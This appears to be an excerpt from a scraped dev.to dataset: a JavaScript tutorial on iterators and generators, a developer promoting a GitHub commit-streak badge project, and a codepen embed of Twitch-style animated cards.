We'll take the object `const range = {from:1, to: 5}` and try to make a for...of print the values between. That is, the output should be: `1, 2, 3, 4, 5`.
Let's write the code and explain what is being done.
```js
let range = {
from: 1,
to: 5,
[Symbol.iterator](){
return {
next: () => {
if(this.from <= this.to){
return { value: this.from++, done: false };
}else{
return { done: true };
}
}
}
}
}
```
Here we've added a new property (method) to our object, with the key `Symbol.iterator`. The for..of function will look for the implementation of this key, and it doesnt have it, it will throw the error we mentioned at the beginning of the blog. And as per the spec, Symbol based keys need to be created with square brackets around.
This new method returns an object (like we mentioned a bit above), which has next method in it. The logic of the next method is self explanatory. It increments the value of **from** till it reaches **to**, and on each iteration it returns an object with value and done keys in it.
When the done = false (in the last iteration), the for...of method will stop iterating it further.
###Problem with the above code
If you notice, the next method is modifying the value of original property **from**. At the end of the iteration, it would have reached 6, which is not good. Because we dont want `range = {from: 1, to: 5}` to become `range = {from: 6, to: 5}`. So what do we do?
```js
let range = {
from: 1,
to: 5,
[Symbol.iterator](){
return {
start: this.from,
end: this.to,
next(){
if(this.start <= this.end){
return { value: this.start++, done: false };
}else{
return { done: true };
}
}
}
}
}
```
We've added **start** and **end** variables under the local scope of the object we're returning. We could have kept the same name as **from**, **to**, but that would have created confusion while reading.
Also we've replaced the arrow function with a regular function so that the `this` inside the next() points to the object that we return. Otherwise next() wont have access to **start** and **end** properties.
###Lets use Generators to further optimise this code
(Generator functions)[https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function*] were designed to solve these kind of use cases. When called, they return an object with **next** method in it. And that method returns something like this:
`{ value: <value of current iteration>, done: <boolean> }`
..which is exactly what our for..of needs.
Lets try modifying our code to use generator function.
```js
let range = {
from: 1,
to: 5,
*[Symbol.iterator](){
for(let value=this.from; value<=this.to; value++){
yield value;
}
}
}
```
Every time iterator method gets called, the loop runs and the yield returns the value of the index(1) and pauses the execution, waiting for next call. Next time for..of calls, it resumes execution from where it paused and returns next index value(2). So and so forth till it exits the loop.
Voila! That was simple and clean. Hope you understood how iterator protocol, and generators work. | ivinjose |
712,063 | Decorate your Github! | and more themes...here This is project link Hi There!! im newbie Developer! I... | 0 | 2021-05-29T11:33:09 | https://dev.to/devxb/decorate-your-github-1hib | [](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)
<center>and more themes...[here](https://github.com/devxb/CommitCombo/blob/main/ENG.md)</center>
---
[This is project link](https://github.com/devxb/CommitCombo/blob/main/ENG.md)
### Hi There!! im newbie Developer!
I have completed my personal project and are distributing it in my server for free.
<mark>It is recommended for those who commit daily or are interested in decorating GitHub.</mark>
This project show the number of continuous commit days on GitHub.
You can apply it like the example below.

######(Mint tag is what I made.)
I have committed for 6 days in a row, and you can see the blue name tag has 6 written on it.
---
[This is project link](https://github.com/devxb/CommitCombo/blob/main/ENG.md)
Any advice on the project would be appreciated.
| devxb | |
712,080 | Twitch's Animated Cards using HTML and CSS | A post by Can Umay | 0 | 2021-05-29T12:09:19 | https://dev.to/canumay/twitch-s-animated-cards-with-html-and-css-o1c | codepen, html, css, frontend | {% codepen https://codepen.io/canumay/pen/gOmGEoK %} | canumay |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.